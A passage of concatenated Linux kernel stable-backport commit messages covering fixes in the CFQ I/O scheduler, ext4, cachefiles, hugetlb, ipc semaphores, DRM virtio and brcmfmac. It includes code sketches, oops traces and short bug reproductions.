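Roughly, the dispatch path now looks like this (a sketch using CFQ's helper
names, not the exact diff):
/* if the head of the fifo already waited past its deadline, pin the queue
 * so an incoming sync queue cannot preempt it before it dispatches once */
rq = cfq_check_fifo(cfqq);
if (rq)
        cfq_mark_cfqq_must_dispatch(cfqq);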
Testing my workload with this patch applied produces much better results.
From the application side I see no timeouts, and the open() latency histogram
generated by systemtap looks much better, with the worst outlier at 131ms:
Latency histogram of xfs_buf_lock acquisition (microseconds):
value |-------------------------------------------------- count
0 | 11
1 |@@@@ 161
2 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 1966
4 |@ 54
8 | 36
16 | 7
32 | 0
64 | 0
~
1024 | 0
2048 | 0
4096 | 1
8192 | 1
16384 | 2
32768 | 0
65536 | 0
131072 | 1
262144 | 0
524288 | 0
Signed-off-by: Glauber Costa <glauber@scylladb.com>
CC: Jens Axboe <axboe@kernel.dk>
CC: linux-block@vger.kernel.org
CC: linux-kernel@vger.kernel.org
Signed-off-by: Glauber Costa <glauber@scylladb.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c09f12186d upstream.
Commit 209851649d "acpi: nfit: Add support for hot-add" added
support for _FIT notifications, but it neglected to verify the
notification event code matches the one in the ACPI spec for
"NFIT Update". Currently there is only one code in the spec, but
once additional codes are added, older kernels (without this fix)
will misbehave by assuming all event notifications are for an
NFIT Update.
Fixes: 209851649d ("acpi: nfit: Add support for hot-add")
Cc: <linux-acpi@vger.kernel.org>
Cc: Dan Williams <dan.j.williams@intel.com>
Reported-by: Linda Knippers <linda.knippers@hpe.com>
Signed-off-by: Vishal Verma <vishal.l.verma@intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c2cbc38b97 upstream.
Before commit a325725633 ("drm: Lobotomize set_busid nonsense for !pci
drivers"), several DRM drivers for platform devices used to expose an
explicit "drm_driver.set_busid" callback, invariably backed by
drm_platform_set_busid().
Commit a325725633 removed drm_platform_set_busid(), along with the
referring .set_busid field initializations. This was justified because
interchangeable functionality had been implemented in drm_dev_alloc() /
drm_dev_init(), which DRM_IOCTL_SET_VERSION would rely on going forward.
However, commit a325725633 also removed drm_virtio_set_busid(), for
which the same consolidation was not appropriate: this .set_busid callback
had been implemented with drm_pci_set_busid(), and not
drm_platform_set_busid(). The error regressed Xorg/xserver on QEMU's
"virtio-vga" card; the drmGetBusid() function from libdrm would no longer
return stable PCI identifiers like "pci:0000:00:02.0", but rather unstable
platform ones like "virtio0".
Reinstate drm_virtio_set_busid() with judicious use of
git checkout -p a325725633c2^ -- drivers/gpu/drm/virtio
Cc: Daniel Vetter <daniel.vetter@intel.com>
Cc: Emil Velikov <emil.l.velikov@gmail.com>
Cc: Gerd Hoffmann <kraxel@redhat.com>
Cc: Gustavo Padovan <gustavo.padovan@collabora.co.uk>
Cc: Hans de Goede <hdegoede@redhat.com>
Cc: Joachim Frieben <jfrieben@hotmail.com>
Reported-by: Joachim Frieben <jfrieben@hotmail.com>
Fixes: a325725633
Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1366842
Signed-off-by: Laszlo Ersek <lersek@redhat.com>
Reviewed-by: Emil Velikov <emil.l.velikov@gmail.com>
Signed-off-by: Dave Airlie <airlied@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a818101d7b upstream.
A NULL-pointer dereference happens in cachefiles_mark_object_inactive()
when it tries to read i_blocks so that it can tell the cachefilesd daemon
how much space it's making available.
The problem is that cachefiles_drop_object() calls
cachefiles_mark_object_inactive() after calling cachefiles_delete_object()
because the object being marked active staves off attempts to (re-)use the
file at that filename until after it has been deleted. This means that
d_inode is NULL by the time we come to try to access it.
To fix the problem, have the caller of cachefiles_mark_object_inactive()
supply the number of blocks freed up.
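The resulting interface change looks roughly like this (argument types
assumed):
/* the caller samples d_backing_inode(...)->i_blocks before the file is
 * deleted and passes the value in, so nothing touches d_inode afterwards */
static void cachefiles_mark_object_inactive(struct cachefiles_cache *cache,
                                            struct cachefiles_object *object,
                                            blkcnt_t i_blocks);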
Without this, the following oops may occur:
BUG: unable to handle kernel NULL pointer dereference at 0000000000000098
IP: [<ffffffffa06c5cc1>] cachefiles_mark_object_inactive+0x61/0xb0 [cachefiles]
...
CPU: 11 PID: 527 Comm: kworker/u64:4 Tainted: G I ------------ 3.10.0-470.el7.x86_64 #1
Hardware name: Hewlett-Packard HP Z600 Workstation/0B54h, BIOS 786G4 v03.19 03/11/2011
Workqueue: fscache_object fscache_object_work_func [fscache]
task: ffff880035edaf10 ti: ffff8800b77c0000 task.ti: ffff8800b77c0000
RIP: 0010:[<ffffffffa06c5cc1>] cachefiles_mark_object_inactive+0x61/0xb0 [cachefiles]
RSP: 0018:ffff8800b77c3d70 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff8800bf6cc400 RCX: 0000000000000034
RDX: 0000000000000000 RSI: ffff880090ffc710 RDI: ffff8800bf761ef8
RBP: ffff8800b77c3d88 R08: 2000000000000000 R09: 0090ffc710000000
R10: ff51005d2ff1c400 R11: 0000000000000000 R12: ffff880090ffc600
R13: ffff8800bf6cc520 R14: ffff8800bf6cc400 R15: ffff8800bf6cc498
FS: 0000000000000000(0000) GS:ffff8800bb8c0000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000098 CR3: 00000000019ba000 CR4: 00000000000007e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
Stack:
ffff880090ffc600 ffff8800bf6cc400 ffff8800867df140 ffff8800b77c3db0
ffffffffa06c48cb ffff880090ffc600 ffff880090ffc180 ffff880090ffc658
ffff8800b77c3df0 ffffffffa085d846 ffff8800a96b8150 ffff880090ffc600
Call Trace:
[<ffffffffa06c48cb>] cachefiles_drop_object+0x6b/0xf0 [cachefiles]
[<ffffffffa085d846>] fscache_drop_object+0xd6/0x1e0 [fscache]
[<ffffffffa085d615>] fscache_object_work_func+0xa5/0x200 [fscache]
[<ffffffff810a605b>] process_one_work+0x17b/0x470
[<ffffffff810a6e96>] worker_thread+0x126/0x410
[<ffffffff810a6d70>] ? rescuer_thread+0x460/0x460
[<ffffffff810ae64f>] kthread+0xcf/0xe0
[<ffffffff810ae580>] ? kthread_create_on_node+0x140/0x140
[<ffffffff81695418>] ret_from_fork+0x58/0x90
[<ffffffff810ae580>] ? kthread_create_on_node+0x140/0x140
The oopsing code shows:
callq 0xffffffff810af6a0 <wake_up_bit>
mov 0xf8(%r12),%rax
mov 0x30(%rax),%rax
mov 0x98(%rax),%rax <---- oops here
lock add %rax,0x130(%rbx)
where this is:
d_backing_inode(object->dentry)->i_blocks
Fixes: a5b3a80b89 (CacheFiles: Provide read-and-reset release counters for cachefilesd)
Reported-by: Jianhong Yin <jiyin@redhat.com>
Signed-off-by: David Howells <dhowells@redhat.com>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Reviewed-by: Steve Dickson <steved@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f2b20f6ee8 upstream.
This fixes a bug where the permission was not properly checked in
overlayfs. The testcase is ltp/utimensat01.
It is also cleaner and safer to do the permission checking in the vfs
helper instead of the caller.
This patch introduces an additional ia_valid flag ATTR_TOUCH (since
touch(1) is the most obvious user of utimes(NULL)) that is passed into
notify_change whenever the conditions for this special permission checking
mode are met.
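For illustration, the utimes(NULL) path then looks roughly like this (a sketch,
not the exact diff):
/* utimes(NULL): "touch" semantics; let notify_change() apply the special
 * permission check described above */
if (!times)
        newattrs.ia_valid |= ATTR_TOUCH;
error = notify_change(path->dentry, &newattrs, &delegated_inode);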
Reported-by: Aihua Zhang <zhangaihua1@huawei.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Tested-by: Aihua Zhang <zhangaihua1@huawei.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3a8db79889 upstream.
After backporting commit ee44b4bc05 ("dlm: use sctp 1-to-1 API")
series to a kernel with an older workqueue which didn't use RCU yet, it
was noticed that we are freeing the workqueues in dlm_lowcomms_stop()
too early as free_conn() will try to access that memory for canceling
the queued works if any.
This issue was introduced by commit 0d737a8cfd: before it, no such
attempt to cancel the queued works was performed, so the issue was
not present.
This patch fixes it by simply inverting the free order.
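The teardown order in dlm_lowcomms_stop() roughly becomes (a sketch; the
workqueue-teardown helper name is an assumption):
/* free the connections while the workqueues still exist, because
 * free_conn() may cancel work that was queued on them */
foreach_conn(free_conn);
work_stop();            /* only now destroy the send/recv workqueues */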
Fixes: 0d737a8cfd ("dlm: fix race while closing connections")
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David Teigland <teigland@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 80da44c29d upstream.
This patch changes the p8_ghash driver to use ghash-generic as a fixed
fallback implementation. This allows the correct value of descsize to be
defined directly in its shash_alg structure and avoids problems with
incorrect buffer sizes when its state is exported or imported.
Reported-by: Jan Stancek <jstancek@redhat.com>
Fixes: cc333cd68d ("crypto: vmx - Adding GHASH routines for VMX module")
Signed-off-by: Marcelo Cerri <marcelo.cerri@canonical.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a397ba829d upstream.
Move common values and types used by ghash-generic to a new header file
so drivers can directly use ghash-generic as a fallback implementation.
Fixes: cc333cd68d ("crypto: vmx - Adding GHASH routines for VMX module")
Signed-off-by: Marcelo Cerri <marcelo.cerri@canonical.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9b623df614 upstream.
When zeroing blocks for DAX allocations, we also have to unmap aliases
in the block device mappings. Otherwise writeback can overwrite zeros
with stale data from block device page cache.
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e81d44778d upstream.
The commit 6050d47adc: "ext4: bail out from make_indexed_dir() on
first error" could end up leaking bh2 in the error path.
[ Also avoid renaming bh2 to bh, which just confuses things --tytso ]
Signed-off-by: yangsheng <yngsion@gmail.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cca32b7eeb upstream.
Currently when doing a DAX hole punch with ext4 we fail to do a writeback.
This is because the logic around filemap_write_and_wait_range() in
ext4_punch_hole() only looks for dirty page cache pages in the radix tree,
not for dirty DAX exceptional entries.
Signed-off-by: Ross Zwisler <ross.zwisler@linux.intel.com>
Reviewed-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4e800c0359 upstream.
Pages have their buffers cleared after an ext4 delayed block allocation
failure; however, their pte_dirty flag is not cleaned. If the pages are
later unmapped, then according to pte_dirty, unmap_page_range() may try to
call __set_page_dirty(), which may lead to the BUG_ON at
mpage_prepare_extent_to_map(): head = page_buffers(page);.
This patch simply calls clear_page_dirty_for_io() in
mpage_release_unused_pages() to clean pte_dirty for mmapped pages.
Steps to reproduce the bug:
(1) mmap a file in ext4
addr = (char *)mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_SHARED,
fd, 0);
memset(addr, 'i', 4096);
(2) return EIO at
ext4_writepages->mpage_map_and_submit_extent->mpage_map_one_extent,
which causes this log message to be printed:
ext4_msg(sb, KERN_CRIT,
"Delayed block allocation failed for "
"inode %lu at logical offset %llu with"
" max blocks %u with error %d",
inode->i_ino,
(unsigned long long)map->m_lblk,
(unsigned)map->m_len, -err);
(3) Unmapping the addr causes a warning at
__set_page_dirty: WARN_ON_ONCE(warn && !PageUptodate(page));
(4) Wait for a minute, then the BUG_ON happens.
Signed-off-by: wangguang <wangguang03@zte.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 93e3b4e663 upstream.
Now, ext4_do_update_inode() clears high 16-bit fields of uid/gid
of deleted and evicted inode to fix up interoperability with old
kernels. However, it checks only i_dtime of an inode to determine
whether the inode was deleted and evicted, and this is very risky,
because i_dtime can be used for the pointer maintaining orphan inode
list, too. We need to further check whether the i_dtime is being
used for the orphan inode list even if the i_dtime is not NULL.
We found that the high 16-bit fields of an inode's uid/gid are
unintentionally and permanently cleared when, in order: an inode truncation
has just been triggered but not yet finished, the inode metadata with the
cleared high uid/gid bits is written to disk, and a sudden power-off
follows.
Signed-off-by: Daeho Jeong <daeho.jeong@samsung.com>
Signed-off-by: Hobin Woo <hobin.woo@samsung.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 14fbd4aa61 upstream.
Online defragging of encrypted files is not currently implemented.
However, the move extent ioctl can still return successfully when
called. For example, this occurs when xfstest ext4/020 is run on an
encrypted file system, resulting in a corrupted test file and a
corresponding test failure.
Until the proper functionality is implemented, fail the move extent
ioctl if either the original or donor file is encrypted.
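A minimal sketch of such a check at the top of the move-extent path (the
encryption predicate name is an assumption based on ext4 helpers of that era):
/* online defrag of encrypted files is not implemented yet */
if (ext4_encrypted_inode(orig_inode) || ext4_encrypted_inode(donor_inode))
        return -EOPNOTSUPP;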
Signed-off-by: Eric Whitney <enwlinux@gmail.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e03a9976af upstream.
Thomas has reported a lockdep splat hitting in
add_transaction_credits(). The problem is that that function calls
jbd2_might_wait_for_commit() while holding j_state_lock which is wrong
(we do not really wait for transaction commit while holding that lock).
Fix the problem by moving jbd2_might_wait_for_commit() into places where
we are ready to wait for transaction commit and thus j_state_lock is
unlocked.
Fixes: 1eaa566d36
Reported-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c2a9737f45 upstream.
We triggered a dead loop in truncate_inode_pages_range() on a 32-bit
architecture with the test case below:
...
fd = open();
write(fd, buf, 4096);
preadv64(fd, &iovec, 1, 0xffffffff000);
ftruncate(fd, 0);
...
Then ftruncate() will never return.
The filesystem used in this case is ubifs, but it can be triggered on
many other filesystems.
When preadv64() is called with offset=0xffffffff000, a page with
index=0xffffffff will be added to the radix tree of ->mapping. Then
this page can be found in ->mapping with pagevec_lookup(). After that,
truncate_inode_pages_range(), which is called in ftruncate(), will fall
into an infinite loop:
- find a page with index=0xffffffff, since index>=end, this page won't
be truncated
- index++, and index become 0
- the page with index=0xffffffff will be found again
The data type of index is unsigned long, so index won't overflow to 0 on
a 64-bit architecture in this case, and the dead loop won't happen.
Since truncate_inode_pages_range() is executed with holding lock of
inode->i_rwsem, any operation related with this lock will be blocked,
and a hung task will happen, e.g.:
INFO: task truncate_test:3364 blocked for more than 120 seconds.
...
call_rwsem_down_write_failed+0x17/0x30
generic_file_write_iter+0x32/0x1c0
ubifs_write_iter+0xcc/0x170
__vfs_write+0xc4/0x120
vfs_write+0xb2/0x1b0
SyS_write+0x46/0xa0
The page with index=0xffffffff added to ->mapping is useless. Fix this
by checking the read position before allocating pages.
Link: http://lkml.kernel.org/r/1475151010-40166-1-git-send-email-fangwei1@huawei.com
Signed-off-by: Wei Fang <fangwei1@huawei.com>
Cc: Christoph Hellwig <hch@infradead.org>
Cc: Dave Chinner <david@fromorbit.com>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2247bb335a upstream.
Patch series "mm/hugetlb: memory offline issues with hugepages", v4.
This addresses several issues with hugepages and memory offline. While
the first patch fixes a panic, and is therefore rather important, the
last patch is just a performance optimization.
The second patch fixes a theoretical issue with reserved hugepages,
while still leaving some ugly usability issue, see description.
This patch (of 3):
dissolve_free_huge_pages() will either run into the VM_BUG_ON() or a
list corruption and addressing exception when trying to set a memory
block offline that is part (but not the first part) of a "gigantic"
hugetlb page with a size > memory block size.
When no other smaller hugetlb page sizes are present, the VM_BUG_ON()
will trigger directly. In the other case we will run into an addressing
exception later, because dissolve_free_huge_page() will not work on the
head page of the compound hugetlb page which will result in a NULL
hstate from page_hstate().
To fix this, first remove the VM_BUG_ON() because it is wrong, and then
use the compound head page in dissolve_free_huge_page(). This means
that an unused pre-allocated gigantic page that has any part of itself
inside the memory block that is going offline will be dissolved
completely. Losing an unused gigantic hugepage is preferable to failing
the memory offline, for example in the situation where a (possibly
faulty) memory DIMM needs to go offline.
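The core of the change, roughly (a sketch of dissolving via the compound head,
not the full function):
/* always operate on the head page, so page_hstate() is valid even when
 * the block being offlined starts in the middle of a gigantic page */
struct page *head = compound_head(page);
struct hstate *h = page_hstate(head);
/* counter updates and freeing then use 'head' and 'h' */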
Fixes: c8721bbb ("mm: memory-hotplug: enable memory hotplug to handle hugepage")
Link: http://lkml.kernel.org/r/20160926172811.94033-2-gerald.schaefer@de.ibm.com
Signed-off-by: Gerald Schaefer <gerald.schaefer@de.ibm.com>
Acked-by: Michal Hocko <mhocko@suse.com>
Acked-by: Naoya Horiguchi <n-horiguchi@ah.jp.nec.com>
Cc: "Kirill A . Shutemov" <kirill.shutemov@linux.intel.com>
Cc: Vlastimil Babka <vbabka@suse.cz>
Cc: Mike Kravetz <mike.kravetz@oracle.com>
Cc: "Aneesh Kumar K . V" <aneesh.kumar@linux.vnet.ibm.com>
Cc: Martin Schwidefsky <schwidefsky@de.ibm.com>
Cc: Heiko Carstens <heiko.carstens@de.ibm.com>
Cc: Rui Teng <rui.teng@linux.vnet.ibm.com>
Cc: Dave Hansen <dave.hansen@linux.intel.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5864a2fd30 upstream.
Commit 6d07b68ce1 ("ipc/sem.c: optimize sem_lock()") introduced a
race:
sem_lock has a fast path that allows parallel simple operations.
There are two reasons why a simple operation cannot run in parallel:
- a non-simple operation is ongoing (sma->sem_perm.lock held)
- a complex operation is sleeping (sma->complex_count != 0)
As both facts are stored independently, a thread can bypass the current
checks by sleeping in the right positions. See below for more details
(or kernel bugzilla 105651).
The patch fixes that by creating one variable (complex_mode)
that tracks both reasons why parallel operations are not possible.
The patch also updates stale documentation regarding the locking.
With regards to stable kernels:
The patch is required for all kernels that include the
commit 6d07b68ce1 ("ipc/sem.c: optimize sem_lock()") (3.10?)
The alternative is to revert the patch that introduced the race.
The patch is safe for backporting, i.e. it makes no assumptions
about memory barriers in spin_unlock_wait().
Background:
Here is the race of the current implementation:
Thread A: (simple op)
- does the first "sma->complex_count == 0" test
Thread B: (complex op)
- does sem_lock(): This includes an array scan. But the scan can't
find Thread A, because Thread A does not own sem->lock yet.
- the thread does the operation, increases complex_count,
drops sem_lock, sleeps
Thread A:
- spin_lock(&sem->lock), spin_is_locked(sma->sem_perm.lock)
- sleeps before the complex_count test
Thread C: (complex op)
- does sem_lock (no array scan, complex_count==1)
- wakes up Thread B.
- decrements complex_count
Thread A:
- does the complex_count test
Bug:
Now both thread A and thread C operate on the same array, without
any synchronization.
Fixes: 6d07b68ce1 ("ipc/sem.c: optimize sem_lock()")
Link: http://lkml.kernel.org/r/1469123695-5661-1-git-send-email-manfred@colorfullife.com
Reported-by: <felixh@informatik.uni-bremen.de>
Cc: "H. Peter Anvin" <hpa@zytor.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Davidlohr Bueso <dave@stgolabs.net>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Ingo Molnar <mingo@elte.hu>
Cc: <1vier1@web.de>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 07d0e9a847 upstream.
If a VFC port gets unmapped in the VIOS, it may not respond with a CRQ
init complete following H_REG_CRQ. If this occurs, we can end up having
called scsi_block_requests without a corresponding unblock until the init
complete happens, which may never occur, and we end up hanging I/O
requests. This patch ensures the host action stays set to
IBMVFC_HOST_ACTION_TGT_DEL so we move all rports into devloss state and
unblock unless we receive an init complete.
Signed-off-by: Brian King <brking@linux.vnet.ibm.com>
Acked-by: Tyrel Datwyler <tyreld@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 069d5ac9ae upstream.
Seth Forshee reports that in 4.8-rcN some automounts are failing
because the credentials used to request the automount changed.
The relevant call path is:
follow_automount()
->d_automount
autofs4_d_automount
autofs4_mount_wait
autofs4_wait
In autofs4_wait() wq_uid and wq_gid are set to current_uid() and
current_gid() respectively. With follow_automount now overriding creds,
the uid that we export to userspace changes, and that breaks existing
setups.
To remove the regression set wq_uid and wq_gid from
current_real_cred()->uid and current_real_cred()->gid respectively.
This restores the current behavior as current->real_cred is identical
to current->cred except when override creds are used.
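A sketch of the change in autofs4_wait() (field names follow the description
above and are otherwise assumptions):
/* use the real credentials, not any override creds installed by
 * follow_automount(), so the uid/gid reported to the daemon is stable */
wq->uid = current_real_cred()->uid;
wq->gid = current_real_cred()->gid;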
Fixes: aeaa4a79ff ("fs: Call d_automount with the filesystems creds")
Reported-by: Seth Forshee <seth.forshee@canonical.com>
Tested-by: Seth Forshee <seth.forshee@canonical.com>
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 61ab0d403b upstream.
In sst_prepare_and_post_msg(), when a response is received in "block",
the following code gets executed:
*data = kzalloc(block->size, GFP_KERNEL);
memcpy(data, (void *) block->data, block->size);
The memcpy() call overwrites the content of the *data pointer instead of
filling the newly-allocated memory (whose pointer is held in *data).
Fix this by merging kzalloc+memcpy into a single kmemdup() call.
Thanks Joe Perches for suggesting using kmemdup()
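Roughly, the fixed allocation becomes (a sketch; the error handling is an
assumption):
/* duplicate the response and store the new pointer where the caller
 * expects it, instead of memcpy()ing over the pointer itself */
*data = kmemdup(block->data, block->size, GFP_KERNEL);
if (!*data)
        return -ENOMEM;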
Fixes: 60dc8dbacb ("ASoC: Intel: sst: Add some helper functions")
Signed-off-by: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a8961cae29 upstream.
In the FLL parameter calculation, the maximum FVCO should be chosen.
This patch fixes the bug of the wrong FVCO being chosen.
Signed-off-by: John Hsu <KCHSU0@nuvoton.com>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7f00ee2bbc upstream.
Flowrings contain skbs waiting for transmission that were passed to us
by netif. It means we checked every one of them looking for 802.1x
Ethernet type. When deleting flowring we have to use freeing function
that will check for 802.1x type as well.
Freeing skbs without a proper check was leading to the counter not being
properly decreased. This was triggering a WARNING every time
brcmf_netdev_wait_pend8021x was called.
Signed-off-by: Rafał Miłecki <rafal@milecki.pl>
Acked-by: Arend van Spriel <arend@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 23e9c128ad upstream.
This function is called from get_station callback which means that every
time user space was getting/dumping station(s) we were leaking 2 KiB.
Signed-off-by: Rafał Miłecki <rafal@milecki.pl>
Fixes: 1f0dc59a6d ("brcmfmac: rework .get_station() callback")
Acked-by: Arend van Spriel <arend.vanspriel@broadcom.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7703773ef1 upstream.
The struct cfg80211_pmksa defines its bssid field as:
const u8 *bssid;
contrary to struct brcmf_pmksa, which uses:
u8 bssid[ETH_ALEN];
Therefore in brcmf_cfg80211_del_pmksa(), &pmksa->bssid takes the address
of this field (of type u8**), not the one of its content (which would be
u8*). Remove the & operator to make brcmf_dbg("%pM") and memcmp()
behave as expected.
This bug has been found using a custom static checker (which checks the
usage of %p... attributes at build time). It has been introduced in
commit 6c404f34f2 ("brcmfmac: Cleanup pmksa cache handling code"),
which replaced pmksa->bssid by &pmksa->bssid while refactoring the code,
without modifying struct cfg80211_pmksa definition.
Replace &pmk[i].bssid with pmk[i].bssid too to make the code clearer,
this change does not affect the semantic.
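To make the pointer-versus-array distinction concrete (a sketch, not the
driver code):
/* struct cfg80211_pmksa has 'const u8 *bssid' (a pointer member):
 *   pmksa->bssid  -> the MAC address bytes (what %pM and memcmp expect)
 *   &pmksa->bssid -> the address of the pointer itself (the bug)
 */
match = !memcmp(pmksa->bssid, pmk[i].bssid, ETH_ALEN);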
Fixes: 6c404f34f2 ("brcmfmac: Cleanup pmksa cache handling code")
Signed-off-by: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d3798ae8c6 upstream.
When the underflow checks were added to workingset_node_shadow_dec(),
they triggered immediately:
kernel BUG at ./include/linux/swap.h:276!
invalid opcode: 0000 [#1] SMP
Modules linked in: isofs usb_storage fuse xt_CHECKSUM ipt_MASQUERADE nf_nat_masquerade_ipv4 tun nf_conntrack_netbios_ns nf_conntrack_broadcast ip6t_REJECT nf_reject_ipv6
soundcore wmi acpi_als pinctrl_sunrisepoint kfifo_buf tpm_tis industrialio acpi_pad pinctrl_intel tpm_tis_core tpm nfsd auth_rpcgss nfs_acl lockd grace sunrpc dm_crypt
CPU: 0 PID: 20929 Comm: blkid Not tainted 4.8.0-rc8-00087-gbe67d60ba944 #1
Hardware name: System manufacturer System Product Name/Z170-K, BIOS 1803 05/06/2016
task: ffff8faa93ecd940 task.stack: ffff8faa7f478000
RIP: page_cache_tree_insert+0xf1/0x100
Call Trace:
__add_to_page_cache_locked+0x12e/0x270
add_to_page_cache_lru+0x4e/0xe0
mpage_readpages+0x112/0x1d0
blkdev_readpages+0x1d/0x20
__do_page_cache_readahead+0x1ad/0x290
force_page_cache_readahead+0xaa/0x100
page_cache_sync_readahead+0x3f/0x50
generic_file_read_iter+0x5af/0x740
blkdev_read_iter+0x35/0x40
__vfs_read+0xe1/0x130
vfs_read+0x96/0x130
SyS_read+0x55/0xc0
entry_SYSCALL_64_fastpath+0x13/0x8f
Code: 03 00 48 8b 5d d8 65 48 33 1c 25 28 00 00 00 44 89 e8 75 19 48 83 c4 18 5b 41 5c 41 5d 41 5e 5d c3 0f 0b 41 bd ef ff ff ff eb d7 <0f> 0b e8 88 68 ef ff 0f 1f 84 00
RIP page_cache_tree_insert+0xf1/0x100
This is a long-standing bug in the way shadow entries are accounted in
the radix tree nodes. The shrinker needs to know when radix tree nodes
contain only shadow entries, no pages, so node->count is split in half
to count shadows in the upper bits and pages in the lower bits.
Unfortunately, the radix tree implementation doesn't know of this and
assumes all entries are in node->count. When there is a shadow entry
directly in root->rnode and the tree is later extended, the radix tree
implementation will copy that entry into the new node and bump its
node->count, i.e. increases the page count bits. Once the shadow gets
removed and we subtract from the upper counter, node->count underflows
and triggers the warning. Afterwards, without node->count reaching 0
again, the radix tree node is leaked.
Limit shadow entries to when we have actual radix tree nodes and can
count them properly. That means we lose the ability to detect refaults
from files that had only the first page faulted in at eviction time.
Fixes: 449dd6984d ("mm: keep page cache radix tree nodes in check")
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Reported-and-tested-by: Linus Torvalds <torvalds@linux-foundation.org>
Reviewed-by: Jan Kara <jack@suse.cz>
Cc: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit edfc23ee3e upstream.
Although rare, it's possible to hit a PCI error early in device probe,
meaning some structs are possibly not entirely initialized, and some might
even be completely uninitialized, leading to a NULL pointer dereference.
The i40e driver currently presents a "bad" behavior if the device hits
such an early PCI error: firstly, the struct i40e_pf might not be
attached to the pci_dev yet, leading to a NULL pointer dereference on
access to pf->state.
Even checking if the struct is NULL and avoiding the access in that
case isn't enough, since the driver cannot recover from PCI error
that early; in our experiments we saw multiple failures on kernel
log, like:
[549.664] i40e 0007:01:00.1: Initial pf_reset failed: -15
[549.664] i40e: probe of 0007:01:00.1 failed with error -15
[...]
[871.644] i40e 0007:01:00.1: The driver for the device stopped because the
device firmware failed to init. Try updating your NVM image.
[871.644] i40e: probe of 0007:01:00.1 failed with error -32
[...]
[872.516] i40e 0007:01:00.0: ARQ: Unknown event 0x0000 ignored
Between the first probe failure (error -15) and the second (error -32)
another PCI error happened due to the first bad probe. Also, driver
started to flood console with those ARQ event messages.
This patch will prevent these issues by allowing the error recovery
